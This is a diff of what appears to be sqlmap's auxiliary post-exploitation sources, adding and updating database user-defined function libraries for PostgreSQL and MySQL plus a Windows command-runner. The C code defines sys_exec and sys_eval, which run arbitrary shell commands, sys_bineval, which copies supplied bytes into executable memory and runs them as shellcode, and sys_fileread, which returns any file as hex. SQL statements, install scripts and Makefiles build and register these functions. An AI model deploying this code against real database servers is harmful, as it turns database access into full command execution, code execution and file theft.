-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	//SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif

extra/runcmd/README.txt

@@ -0,0 +1,7 @@
+Files in this folder can be used to compile auxiliary program that can
+be used for running command prompt commands skipping standard "cmd /c" way. 
+They are licensed under the terms of the GNU Lesser General Public License 
+and it's compiled version is available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_

extra/runcmd/windows/README.txt

@@ -0,0 +1,4 @@
+Compile only the Release version because the Runtime library option
+(Project Properties -> Configuration Properties -> C/C++ -> Code
+Generation) is set to "Multi-threaded (/MT)", which statically links
+everything into executable and doesn't compile Debug version at all.

extra/runcmd/windows/runcmd.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

extra/runcmd/windows/runcmd/runcmd.cpp

@@ -1,8 +1,7 @@
 /* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
+	runcmd - a program for running command prompt commands
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2010 Miroslav Stampar
-	web: http://bernardodamele.blogspot.com/
+	email: miroslav.stampar@gmail.com
-	email: bernardo.damele@gmail.com
 	
 	This library is free software; you can redistribute it and/or
 	modify it under the terms of the GNU Lesser General Public
@@ -19,6 +18,29 @@
 	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 */
 
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+#include <stdio.h>
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+#include <windows.h>
-CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+#include <use_ansi.h>
+#include "stdafx.h"
+#include <string>
+
+using namespace std;
+int main(int argc, char* argv[])
+{
+  FILE *fp;
+  string cmd;
+
+  for( int count = 1; count < argc; count++ )
+	cmd += " " + string(argv[count]);
+
+  fp = _popen(cmd.c_str(), "r");
+
+  if (fp != NULL) {
+    char buffer[BUFSIZ];
+
+    while (fgets(buffer, sizeof buffer, fp) != NULL)
+      fputs(buffer, stdout);
+  }
+
+  return 0;
+}

extra/runcmd/windows/runcmd/runcmd.vcproj

@@ -0,0 +1,225 @@
+<?xml version="1.0" encoding="windows-1250"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="runcmd"
+	ProjectGUID="{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+	RootNamespace="runcmd"
+	Keyword="Win32Proj"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\runcmd.cpp"
+				>
+			</File>
+			<File
+				RelativePath=".\stdafx.cpp"
+				>
+				<FileConfiguration
+					Name="Debug|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+				<FileConfiguration
+					Name="Release|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath=".\stdafx.h"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+		<File
+			RelativePath=".\ReadMe.txt"
+			>
+		</File>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

extra/runcmd/windows/runcmd/stdafx.cpp

@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// runcmd.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file

extra/runcmd/windows/runcmd/stdafx.h

@@ -0,0 +1,17 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#ifndef _WIN32_WINNT		// Allow use of features specific to Windows XP or later.                   
+#define _WIN32_WINNT 0x0501	// Change this to the appropriate value to target other versions of Windows.
+#endif						
+
+#include <stdio.h>
+#include <tchar.h>
+
+
+
+// TODO: reference additional headers your program requires here

extra/udfhack/README.txt

@@ -0,0 +1,7 @@
+Files in this folder can be used to compile shared objects that define
+some user-defined functions for MySQL and PostgreSQL. They are licensed
+under the terms of the GNU Lesser General Public License and their
+compiled versions are available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/udf/

extra/udfhack/linux/README.txt

@@ -0,0 +1,22 @@
+Before compiling, you need to adapt the following to your environment:
+
+Variables in install.sh script:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+USER                    Database management system administrative username
+PORT                    Database management system port
+VERSION                 Database management system version (PostgreSQL only)
+
+Variable in Makefile (MySQL only):
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+LIBDIR                  Database management system absolute file system
+                        path for third party libraries
+
+Then you can launch './install.sh' if you want to compile the shared
+object from the source code and create the user-defined functions on the
+database management system.
+If you only want to compile the shared object, you need to call only the
+'make' command.

extra/udfhack/linux/lib_mysqludf_sys/Makefile

@@ -0,0 +1,9 @@
+# For MySQL < 5.1
+LIBDIR=/usr/lib
+# For MySQL >= 5.1
+#LIBDIR=/usr/lib/mysql/plugin
+
+install:
+	gcc -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
+	strip -sx lib_mysqludf_sys.so
+	cp -f lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so

extra/udfhack/linux/lib_mysqludf_sys/install.sh

@@ -1,7 +1,7 @@
 #!/bin/bash
 # lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 # Copyright (C) 2007  Roland Bouman 
-# Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+# Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 # web: http://www.mysqludf.org/
 # email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 # 
@@ -20,8 +20,8 @@
 # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 
 # Adapt the following settings to your environment
-PORT="3306"
 USER="root"
+PORT="3306"
 
 echo "Compiling the MySQL UDF"
 make
@@ -29,7 +29,7 @@ make
 if test $? -ne 0; then
 	echo "ERROR: You need libmysqlclient development software installed"
 	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-	echo "apt-get install libmysqlclient15-dev"
+	echo "apt-get install libmysqlclient-dev"
 	exit 1
 else
 	echo "MySQL UDF compiled successfully"

extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,7 +1,7 @@
 /* 
 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 	web: http://www.mysqludf.org/
 	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 	

extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.sql

@@ -1,7 +1,7 @@
 /*
         lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
         Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+        Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
         web: http://www.mysqludf.org/
         email: roland.bouman@gmail.com, bernardo.damele@gmail.com
 

extra/udfhack/linux/lib_postgresqludf_sys/Makefile

@@ -0,0 +1,16 @@
+LIBDIR=/tmp
+
+8.4:
+	gcc -Wall -I/usr/include/postgresql/8.4/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.3:
+	gcc -Wall -I/usr/include/postgresql/8.3/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.2:
+	gcc -Wall -I/usr/include/postgresql/8.2/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so

extra/udfhack/linux/lib_postgresqludf_sys/install.sh

@@ -1,6 +1,6 @@
 #!/bin/bash
 # lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2009  Bernardo Damele A. G.
+# Copyright (C) 2009-2010  Bernardo Damele A. G.
 # web: http://bernardodamele.blogspot.com/
 # email: bernardo.damele@gmail.com
 # 
@@ -19,11 +19,13 @@
 # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 
 # Adapt the following settings to your environment
-#PORT="5433"
-#VERSION="8.2"
-PORT="5432"
-VERSION="8.3"
 USER="postgres"
+PORT="5434"
+VERSION="8.4"
+#PORT="5433"
+#VERSION="8.3"
+#PORT="5432"
+#VERSION="8.2"
 
 echo "Compiling the PostgreSQL UDF"
 make ${VERSION}
@@ -34,8 +36,10 @@ if test $? -ne 0; then
 
 	if test "${VERSION}" == "8.2"; then
 		echo "apt-get install postgresql-server-dev-8.2"
-	else
+	elif test "${VERSION}" == "8.3"; then
 		echo "apt-get install postgresql-server-dev-8.3"
+	elif test "${VERSION}" == "8.4"; then
+		echo "apt-get install postgresql-server-dev-8.4"
 	fi
 
 	exit 1

extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -47,7 +47,11 @@ PG_MODULE_MAGIC;
 #endif
 
 PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	int32 result = 0;
@@ -72,7 +76,11 @@ extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
 }
 
 PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	text *result_text;
 	int32 argv0_size;
@@ -112,15 +120,22 @@ extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
 	}
 
 	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	//VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#ifdef SET_VARSIZE
 	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
 	memcpy(VARDATA(result_text), result, strlen(result));
 
 	PG_RETURN_POINTER(result_text);
 }
 
 PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	size_t len;
@@ -190,3 +205,70 @@ DWORD WINAPI exec_payload(LPVOID lpParameter)
 	return 0;
 }
 #endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}

extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.sql

@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -22,3 +22,4 @@
 CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
 CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
 CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_fileread' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

extra/udfhack/windows/README.txt

@@ -0,0 +1,25 @@
+Before compiling, certain enviroment variables have to be set,
+depending on the project used. For project lib_mysqludf_sys variables
+PLATFORM_SDK_DIR and MYSQL_SERVER_DIR have to be set, while for project
+lib_postgresqludf_sys variables PLATFORM_SDK_DIR and
+POSTGRESQL_SERVER_DIR.
+
+Variables:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		Directory where the Platform SDK is installed
+MYSQL_SERVER_DIR		Directory where the MySQL is installed
+POSTGRESQL_SERVER_DIR	Directory where the PostgreSQL is installed
+
+Procedure for setting environment variables:
+My Computer -> Properties -> Advanced -> Environment Variables
+User variables -> New
+
+Sample values:
+--------------------------------------------------------------------------
+Variable name			Variable value
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
+MYSQL_SERVER_DIR		C:\Program Files\MySQL\MySQL Server 5.1
+POSTGRESQL_SERVER_DIR	C:\Program Files\PostgreSQL\8.4

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_mysqludf_sys", "lib_mysqludf_sys\lib_mysqludf_sys.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,7 +1,7 @@
 /* 
 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 	web: http://www.mysqludf.org/
 	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 	

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.vcproj

@@ -0,0 +1,192 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_mysqludf_sys"
+	ProjectGUID="{4D362A3E-CA53-444C-B1C8-C49641823875}"
+	RootNamespace="lib_mysqludf_sys"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
